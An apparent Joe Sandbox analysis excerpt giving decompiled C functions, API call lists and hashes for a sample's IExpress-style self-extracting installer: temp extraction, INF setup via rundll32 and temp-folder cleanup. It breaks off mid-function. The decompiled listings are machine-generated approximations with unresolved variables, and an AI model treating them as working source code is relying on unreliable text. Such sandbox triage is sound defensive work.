                                                                                                                                                                                                                                            0x00321d23
                                                                                                                                                                                                                                            0x00321d09
                                                                                                                                                                                                                                            0x00321d14
                                                                                                                                                                                                                                            0x00321d1b
                                                                                                                                                                                                                                            0x00321d1b
                                                                                                                                                                                                                                            0x00321d2b
                                                                                                                                                                                                                                            0x00321d2d
                                                                                                                                                                                                                                            0x00321d2d
                                                                                                                                                                                                                                            0x00321d38
                                                                                                                                                                                                                                            0x00321d39
                                                                                                                                                                                                                                            0x00321d46
                                                                                                                                                                                                                                            0x00321cc2
                                                                                                                                                                                                                                            0x00321cc2
                                                                                                                                                                                                                                            0x00321ccc
                                                                                                                                                                                                                                            0x00321cce
                                                                                                                                                                                                                                            0x00321cce
                                                                                                                                                                                                                                            0x00321cdb
                                                                                                                                                                                                                                            0x00321ce6
                                                                                                                                                                                                                                            0x00321cee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00321BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00321BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00321C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00321C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00321140,00000000,00000008,?), ref: 00321CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00321D1B
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-2145762761
                                                                                                                                                                                                                                            • Opcode ID: 5b274f0e5e1050f70053c26da397a6037ed388dbbca7944c466db81a238d9571
                                                                                                                                                                                                                                            • Instruction ID: 266dc4843170e3023eafc2fbf44388995f06139efee60d72cea991e9f3659c52
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b274f0e5e1050f70053c26da397a6037ed388dbbca7944c466db81a238d9571
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74A17C70A00238ABEB339B24FE45FFA776D9B71310F154299E455A72C0DBB09E86CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            [Control-flow graph of the function at 00322F1D, with nodes marked as executed or not executed; the rendered graph is not preserved.]
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00322F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0x328a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00325164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00326CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E003255A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E0032658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0x32a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0x328a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x328a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x328d48 & 0x000000c0;
									if(( *0x328d48 & 0x000000c0) == 0) {
										_t41 =  *0x329a40; // 0x3, executed
										_t26 = E0032256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x328a24; // 0x0
									 *0x329a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x328a38;
										if( *0x328a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00324169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x329a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00323BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x328a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00323B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E003244B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x329124 = E00326285();
							goto L16;
						}
						_t59 =  *0x329a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0032621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x328a24;
				if( *0x328a24 != 0) {
					L4:
					_t34 = E00323A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E003251E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x328a38;
				if( *0x328a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                            0x003230af
                                                                                                                                                                                                                                            0x003230ad
                                                                                                                                                                                                                                            0x003230b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032308b
                                                                                                                                                                                                                                            0x0032308b
                                                                                                                                                                                                                                            0x00323091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323093
                                                                                                                                                                                                                                            0x00323098
                                                                                                                                                                                                                                            0x0032309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032309c
                                                                                                                                                                                                                                            0x00323089
                                                                                                                                                                                                                                            0x0032305c
                                                                                                                                                                                                                                            0x00323061
                                                                                                                                                                                                                                            0x00323063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323063
                                                                                                                                                                                                                                            0x0032302b
                                                                                                                                                                                                                                            0x00323032
                                                                                                                                                                                                                                            0x0032303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032303c
                                                                                                                                                                                                                                            0x00323006
                                                                                                                                                                                                                                            0x0032300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032300e
                                                                                                                                                                                                                                            0x00323015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323015
                                                                                                                                                                                                                                            0x00322f80
                                                                                                                                                                                                                                            0x00322f3f
                                                                                                                                                                                                                                            0x00322f46
                                                                                                                                                                                                                                            0x00322f5f
                                                                                                                                                                                                                                            0x00322f5f
                                                                                                                                                                                                                                            0x00322f64
                                                                                                                                                                                                                                            0x00322f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322f66
                                                                                                                                                                                                                                            0x00322f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322f55
                                                                                                                                                                                                                                            0x00322f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00322F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00322FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00322FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00322FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00322FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032301C
                                                                                                                                                                                                                                              • Part of subcall function 003251E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00322F4D,?,00000002,00000000), ref: 00325201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-4070797333
                                                                                                                                                                                                                                            • Opcode ID: 4308a4caaaa93d509062ab6e818bfae4469f77874328b0158c8b41ee37bd9e8a
                                                                                                                                                                                                                                            • Instruction ID: 9ae0ad7cde5f9ff6834651a897684a3a4055ae3211132c21dde97c490d487885
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4308a4caaaa93d509062ab6e818bfae4469f77874328b0158c8b41ee37bd9e8a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F241C630A017359BDB33AB71BD4676A33ACDB54750F11806EE942D6191EF78CE82CA71
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00322390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E00326CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00321680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E003216B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E00321680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E003216B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E003216B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E0032658A( &_v280, 0x104, 0x321140);
                                                                                                                                                                                                                                            								E00322390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00328A3A,003211F4,00328A3A,00000000,?,?), ref: 003223F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,003211F8), ref: 00322427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,003211FC), ref: 0032243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00322495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 003224A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003224AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 003224BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00328A3A), ref: 003224C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 007c67cf830b41f889024187bb03e9f4b1a73b2d085f17b0a6b72d5e9acdb840
                                                                                                                                                                                                                                            • Instruction ID: 60b72e2dde82b7ccafd5927f7db1981b88944f394324aec508d99f5ed4d058ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 007c67cf830b41f889024187bb03e9f4b1a73b2d085f17b0a6b72d5e9acdb840
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A31A131204B50ABC332EF64ED8AAEF73ACAFC4315F05492DF95586290EB74A90DC752
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00322BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0x32a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0x329124 = 0;
                                                                                                                                                                                                                                            				if(E00322CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00322F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E003252B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0x328a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0x329a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00321F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0x328588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0x329124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00326BB0,00320000,00000000,00000002,0000000A), ref: 00322C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00326BB0,00320000,00000000,00000002,0000000A), ref: 00322C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00322C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00326BB0,00320000,00000000,00000002,0000000A), ref: 00322C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 4f563d763d827e61d71407d36b674a1ad995c47a7012af707a0df6eb888d2693
                                                                                                                                                                                                                                            • Instruction ID: 27cfaf240128807d1b63cc38ba8e910838f4b2d6cc279e70772a42bdb5a749d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f563d763d827e61d71407d36b674a1ad995c47a7012af707a0df6eb888d2693
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E11EC71600335BFC7336BB5BD89B6F376D9B887A0F060429F804E7290CA30DC128662
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00326F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00326EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00326f45
                                                                                                                                                                                                                                            0x00326f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00326F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: 7ef89433e3e103df00e4b266c2565c2efced2100ff88e30b50883d4465de2d45
                                                                                                                                                                                                                                            • Instruction ID: 41def29e19dc96d05f1a693de87a8ab6a03e425b49cd49e04d46b843a3496e90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ef89433e3e103df00e4b266c2565c2efced2100ff88e30b50883d4465de2d45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F490027425155047A6221B70AE1A45575995F5D753F825464E011C4494DB7050515512
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E0032202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
